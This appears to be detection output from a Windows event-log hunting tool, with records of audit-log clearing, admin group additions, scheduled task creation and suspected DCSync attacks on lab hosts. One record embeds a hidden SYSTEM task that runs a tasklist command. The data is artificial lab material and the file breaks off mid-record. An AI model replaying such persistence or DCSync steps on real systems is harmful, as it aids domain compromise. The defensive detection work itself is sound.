( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," + + + + + 4720 + 0 + 0 + 13824 + 0 + 0x8020000000000000 + + + 769634 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + $ + 3B + S-1-5-21-308926384-506822093-3341789130-107104 + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + - + $ + %%1793 + - + %%1793 + %%1793 + %%1793 + %%1793 + %%1793 + %%1794 + %%1794 + 513 + - + 0x0 + 0x15 + + %%2080 + %%2082 + %%2084 + %%1792 + - + %%1793 + +",01566s-win16-ir.threebeesco.com,Security +User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," + + + + + 4720 + 0 + 0 + 13824 + 0 + 0x8020000000000000 + + + 769629 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + $ + 3B + S-1-5-21-308926384-506822093-3341789130-107103 + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + - + $ + %%1793 + - + %%1793 + %%1793 + %%1793 + %%1793 + %%1793 + %%1794 + %%1794 + 513 + - + 0x0 + 0x15 + + %%2080 + %%2082 + %%2084 + %%1792 + - + %%1793 + +",01566s-win16-ir.threebeesco.com,Security +schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238969 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T12:21:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238774 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T11:51:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238563 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T11:21:44Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 772605 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x7b186 + + +",01566s-win16-ir.threebeesco.com,Security +User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732," + + + + + 4732 + 0 + 0 + 13826 + 0 + 0x8020000000000000 + + + 191030 + + + + + Security + MSEDGEWIN10 + + + + + - + S-1-5-20 + Administrators + Builtin + S-1-5-32-544 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x27a10f + - + +",MSEDGEWIN10,Security +User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732," + + + + + 4732 + 0 + 0 + 13826 + 0 + 0x8020000000000000 + + + 191029 + + + + + Security + MSEDGEWIN10 + + + + + - + S-1-5-21-3461203602-4096304019-2269080069-501 + Administrators + Builtin + S-1-5-32-544 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x27a10f + - + +",MSEDGEWIN10,Security +Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 203056 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x418a6fb + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {9923a32a-3607-11d2-b9be-0000f87a36b2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 203050 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + administrator + insecurebank + 0x218b896 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242594 + + + + + Security + DC1.insecurebank.local + + + + + AF3067E0-BB6F-47C2-AA20-F3F458797F38 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242593 + + + + + Security + DC1.insecurebank.local + + + + + 57DCCD4C-7381-4371-8480-D74D47019AD8 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 566836 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + \CYAlyNSS + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <Triggers> + <CalendarTrigger> + <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="LocalSystem"> + <UserId>S-1-5-18</UserId> + <RunLevel>HighestAvailable</RunLevel> + <LogonType>InteractiveToken</LogonType> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>P3D</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="LocalSystem"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> + </Exec> + </Actions> +</Task> + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 198238040 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x8d7099 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242592 + + + + + Security + DC1.insecurebank.local + + + + + 57DCCD4C-7381-4371-8480-D74D47019AD8 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-1